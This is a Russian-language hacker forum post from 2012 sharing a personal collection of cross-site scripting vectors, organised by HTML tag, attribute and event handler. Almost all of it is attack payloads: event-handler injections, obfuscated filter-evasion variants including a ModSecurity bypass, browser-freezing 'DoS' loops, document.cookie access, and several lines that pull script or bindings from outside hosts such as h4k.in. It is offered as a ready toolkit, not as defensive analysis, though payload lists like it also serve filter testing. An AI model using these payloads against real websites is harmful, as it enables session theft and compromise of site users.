Prev Предыдущее сообщение   Следующее сообщение Next
Старый 22.09.2012, 20:34   #1
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
Exclamation XSS Vectors Collection [for every day]

XSS Vectors Collection [for every day]

Хочу обратить ваше внимание на мою коллекцию xss векторов. Собирал в течении последних 3х лет, по просторам интернета.
Как говорится с мира по вектору - рдотовцу xss кардиган =). Думаю тема будет полезна для всех и не канет в небытие.
Дорогая редакция, с нетерением жду ваших коллекций =).

Рассмотренные теги:
Код:
<a>, <applet>, <body>, <div>, <embed>, <form>, <frameset>, <h1>, <html>, <iframe>, <img>,
 <input>, <isindex>, <li>, <link>, <marquee>, <math>, <video>, <object>, <script>, <select>, <style>, <svg>,
 <xml>, <other tags>.
Рассмотренные атрибуты:
Код:
href, code, background, style, src, dynsrc, formaction, action, data, value.
Рассмотренные события:
Код:
onclick, ondblclick, onreadystatechange, onkeypress, onscroll, oninput, onmouseenter, 
 onmouseover, onmousemove, onfocus, onpageshow, onpagehide, onload, onunload, onbeforeunload, onsubmit, onreset,
 onforminput, onformchange, onblur, onmouseout, onmouseup, onmousedown, onmouseleave, onerror, onbegin, onselect,
 onstart, onchange.
================================================== ===================================

Whitespaces
Код:
\x20 \x09 \x0A \x0B \x0C \x0D \xA0 /**/
Alert() function variations
Код:
alert('xss')
prompt('xss')
confirm('xss')
write('xss')

window.alert(1)
window['alert'](1) == window['al\u0065rt'](1)
top['alert'](1)
self['alert'](1)
parent['alert'](1)

µ = self ['\x61lert'], µ(1) 
location['href']= 'javascript:\u0061l'+ String.fromCharCode(101)+'rt(1)' 
top[<>alert</>](1) 
eval(unescape('%61')+/lert(1)/[-1])
Eval() function variations
Код:
eval()
execScript()
Function()
Script()
_FirebugConsole.evaluate()
Document.Cookie variations
Код:
alert(document.cookie)
alert(document['cookie'])
alert(this['doc'+'ument'].cookie)
with(document)alert(cookie)
Base64 morphs
Код:
atob('amF2YXNjcmlwdDphbGVydCgxKQ'); //FF only
btoa("\x7a\xf6\xa5"); //FF only
XSS Dos attack
Код:
<script>while(true){alert('xss_dos');}</script>

while(true)alert('xss_dos')
for(;;)alert('xss_dos')
window.open(window.location)
javascript:for(;;)open()
================================================== ===================================

<A> variations
Код:
<a href="javascript:alert(1)">pew</a> //On click
<a href="pew" style="background-image: expression(alert(1))">
<a href=# onclick=alert(1)>test</a>
<a ondblclick=alert(1)>test</a> //On double click

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>
</a style=""x:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
<APPLET> variations
Код:
<applet code="javascript:alert(1)">
<applet onreadystatechange=alert(1)> //Only IE
<BODY> variations
Код:
<body onkeypress=alert(1)> //Press any key
<body background="javascript:alert(1)">
<body onscroll=alert(1)><br><br><br>. . .<br><input autofocus> //HTML5
<body oninput=alert(1)><input autofocus> //HTML5

<body onmouseenter=alert(1)>
<body onmouseover=alert(1)>
<body onmousemove=alert(1)>

<body onfocus=alert(1)>
<body onpageshow=alert(1)>
<body onpagehide=alert(1)>
<body onunload=alert(1)>
<body onbeforeunload=alert(1)>

Attribute Onload:
<body class='>' onload=alert(); <span>test</body>
<img <body class=>src=xek> onload=1;>
<body alt"x onload=alert(1) y" src="mars.png">
<DIV> variations
Код:
<div style=x=expressio\n(alert(1))>
<div style="width: expression(alert(1));">test</div> 
<div/*\/style=!!!\*/-!!!=exp\r/*expr\*/essio\n(!!!alert(1))>
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<div style=width:1px;filter:glow onfilterchange=alert(1)>test</div>

<div style=”behavior: url(“/file.htc”)
Содержимое подключаемого файла примерно следующее:
<attach event="ondocumentready" handler="parseStylesheets" />
<script language="JavaScript">
function parseStylesheets() {
alert(1)
}
</script>
<EMBED> variations
Код:
<embed src=javascript:alert(1);this.avi;this.wav>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<FORM> variations
Код:
<form id="test" /><button form="test" formaction="javascript:alert(1)">test
<form><button formaction="javascript:alert(1)">test

<form onsubmit=alert(1)><input type=submit> //On click
<form onreset=alert(1)><input type=reset> //On click
<form id=test onforminput=alert(1)><input></form>
<button form=test onformchange=alert(1)>test

<form action="javascript:alert(1)"><input type=image src="pew"></form> //On click
<form action="javascript:alert(1)"><input type=submit> //On click
<form action="javascript:alert(1)"<input type=submit> //On click
<form action="javascript:alert(1)">test</form>
<FRAMESET> variations
Код:
<frameset><frame src="javascript:alert(1)"></frameset>
<frameset onload=alert(1)>
<frameset onblur=alert(1)>
<H1> variations
Код:
<h1 onclick=alert(1)>test</h1> //On click
<h1 onmouseover=alert(1) onmouseout=alert(2)>test</h1>
<HTML> variations
Код:
<html onmousedown=alert(1)>
<html onmouseout=alert(1)>
<html onmouseleave=alert(1)>
<html onmouseenter=alert(1)>
<IFRAME> variations
Код:
<iframe onload=alert(1)>
<iframe src="javascript:alert(1)">

<iframe onreadystatechange=alert(1)> //Only IE
<iframe onreadystatechange=alert(1)></iframe> //Only IE
<IMG> variations
Код:
<img onclick=alert(1)> //On click
<img onmousedown=alert(1) onmouseup=alert(2)> //On click
<img src=pew s='"p">'onerror=alert(1) style=visibility:hidden>
<img src="javascript:alert(1)"> 
<image src="javascript:alert(1)">
<img src=javascript:alert(1) dynsrc=javascript:alert(2)>
<img src="pew" onerror=alert(1)>
<img/src/onerror=alert(1)//>
<img/onerror=alert(1) src=x>
<img src="about:blank" onerror="alert(1);<!--
<img src="x:x" onerror="alert(1)">
<img src=x:alert(alt) onerror=eval(src) alt=1> 
<img src="x:? title=" onerror=alert(1)//">

<comment><img src="</comment><img src=x onerror=alert(1))//">
<style><img src="</style><img src=x onerror=alert(1)//">
<img src="x` `<script>alert(1)</script>"` `>
<br/<img/src=1 onerror=alert(1)> 

<!--<img src="--><img src=x onerror=alert(1)//">
<!-- `<img/src=x:x onerror=alert(1)//--!>
<!--[if]><script>alert(1)</script -->
<!--[if<img src=x onerror=alert(1)//]> -->

<![><img src="]><img src=x onerror=alert(1)//"> 
<svg><![CDATA[><image xlink:href="]]><img src=x:x onerror=alert(1)//"></svg>

<img style="behavior:\75\72\6C\28\23\64\65\66\61\75\6C\74\23\74\69\6D\65\32\29;display:none" onbegin="alert(1)"> //Only IE
<img src="pew" style="-mozbinding:url('http://myserver/xssmoz.xml#xss');" />

<img type=image src="pew" onreadystatechange=alert(1)> //Only IE
<image type=image src="pew" onreadystatechange=alert(1)> //Only IE

ModSecurity bypass

The filter will catch:
<img src="x:gif" onerror="alert(0)">

but miss:
<img src="x:alert" onerror="eval(src%2b'(0)')">
<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>

VBScript

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
<INPUT> variations
Код:
<input type="text" type="image" name="text" value="" src="pew" onerror="alert(1)" />
<input type=image src="javascript:alert(1)" dynsrc="javascript:alert(2)">
<input type=image src="pew" onreadystatechange=alert(1)> //Only IE
<input style=behavior:url(#default#time2) onbegin=alert(1)>
<input onmouseover=alert(1)>
<input value="pew" onselect=alert(1)> //Pick out

<input autofocus onfocus=alert(1)> //HTML5
<input onblur=alert(1)>
<input onblur=alert(1) autofocus> //HTML5
<ISINDEX> variations
Код:
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image> //On click
<isindex type=image src=1 onreadystatechange=alert(1)> //Only IE
<LI> variations
Код:
<li style=list-style:url() onerror=alert(1)></li> 
<body <li background="javascript:alert(1)"/>
<LINK> variations
Код:
<link rel=stylesheet href=data:,{x:expression(alert(1))}
<link onload=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet"/>
<MARQUEE> variations
Код:
<marquee src=`" onscroll=alert(1)//`>
<marquee style="width: expression(alert(1));">foo</marquee>

<marquee onstart='alert(1)'>foo</marquee>
<marquee onstart=alert(1)>foo</marquee>
<marquee onstart=`alert(1)`>foo</marquee>

<marquee id=m foo=al bar=ert onerror=top[m.foo+m.bar](1)>foo</marquee>
<marquee onstart="var x='al'; var y='er'; self[x+y](1)">foo</marquee>
<marquee onstart=`var x=alert; x(1)`>foo</marquee>
<marquee onstart=`location=javascript:alert(1)`>foo</marquee>
<marquee onstart="location.replace('javascript:alert(1)')">foo</marquee>
<marquee c=:al id=m b=ript a=javasc d=ert e=(1) f=replace onstart=location[m.f](m.a+m.b+m.c+m.d+m.e)>foo</marquee>

<marquee onstart=`MsgBox 1` language=vbscript>foo</marquee>
<marquee onstart=`vbscript:MsgBox 1`>foo</marquee>

<marquee onstart=`var x =String; top[x.fromCharCode(97,108,101,114,116)](1);`>foo</marquee>
<marquee onstart=`var y=location; var z=y.hash.substring(1,200);top.location=z`>foo</marquee>
<MATH> variations
Код:
<math href="javascript:alert(1)">CLICKME</math>
<math><maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>
<VIDEO> variations
Код:
<video><source оnerrоr="javascript:alert(1)"> //HTML5
<video onerror="javascript:alert(1)"><source> //HTML5
<video onerror="javascript:alert(1)"><source></source></video> //HTML5
<video src=1 onerror=alert(1)> //HTML5
<OBJECT> variations
Код:
<object data="javascript:alert(1)">
<object src=1 onerror=alert(1)>
<object classid=x><param name=url value=javascript:alert(1)></object>
<object><param name="src" value=javascript:alert(1)></object>
<object type=image src="pew" onreadystatechange=alert(1)></object> //Only IE
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<P> variations
Код:
<p style="width: expression(alert(1));">test</p>
<p style=xss:\65\78\70\72\65\73\73\69\6f\6e(alert(1))>
<p style="behavior:url('#default#time2')" onend="alert(1)">
<p style="b\eh\a\v\i\o\r:url('#default#time2')" onend="alert(1)">
<p style=list-style-image:url(javascript:alert(1))>

//IE VB Messagebox injection
<p style=list-style-image:url(vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83))))>
<SCRIPT> variations
Код:
<script src=1 onerror=alert(1)></script>
<script onreadystatechange=alert(1)> //Only IE
<script onreadystatechange=alert(1)></script> //Only IE
<script for=document event=onreadystatechange>alert(1)</script>
<script src="javascript:alert(1)"></script>
<b <script>alert(1)//</script>0</script></b>
<b "<script>alert(1)</script>">test</b>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<script>({0:#0=alert/#0#/#0#(1)})</script>

<script>
new Function();
Function('a\x6cert(1)')();
</script>

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<xss xmlns:x="http://www.w3.org/1999/xhtml"><x:script>alert(1);</x:script></xss>
<SELECT> variations
Код:
<select autofocus onfocus=alert(1)> //HTML5
<select onchange="javascript:alert(1)"><option><option></select> //On change
<STYLE> variations
Код:
<style>{x=expression(alesrt(1))}</style>
<style>@\import "data:,{x:expression(alerst(1))}";</style> 
<style>body{-moz-binding:url("http://www.ush.it/path/to/evil#xss")}</style>

<style onreadystatechange=alert(1)> //Only IE
<style onreadystatechange=alert(1)></style> //Only IE

<style>*{x=expression\28write\28 1\29\29}</style>
<style>@\import "data:,*%7bx:expression%28write%281%29%29%7D";</style>
<SVG> variations
Код:
<svg onload="javascript:alert(1)">
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
<XML> variations
Код:
<xml onreadystatechange=alert(1)> //Only IE
<xml onreadystatechange=alert(1)>test</xml> //Only IE
<OTHER tags> variations
Код:
<audio src=1 onerror=alert(1)> //HTML5

<base href='javascript:'><img src=`alert(1)`>

<button onclick=alert(1)>test</button> //On click

<bgsound src="javascript:alert(1)"/>

<keygen autofocus onfocus=alert(1)> //HTML5

<?xml-stylesheet href="javascript:alert(1)"?><root/>

<table background=javascript:alert(1)>

<table background=javascript:alert(1)>

<textarea autofocus onfocus=alert(1)> //HTML5

<td>pew</td style="x:expression(alert(1))">

<th>wep</th style="x:expression(alert(1))">

<var onmouseover=alert(1)>test</var>

<xss style="behavior: url(xss.htc);">
<xss style="background-position-x:expression\0028\0065\0076\0061\006C\0028\0061\006C\0065\0072\0074\0028\0027pwn3d\0027\0029\0029\0029
<xss style=&#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67:url(\2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73)>

" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
" sXtXyXlXeX=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
RulleR вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot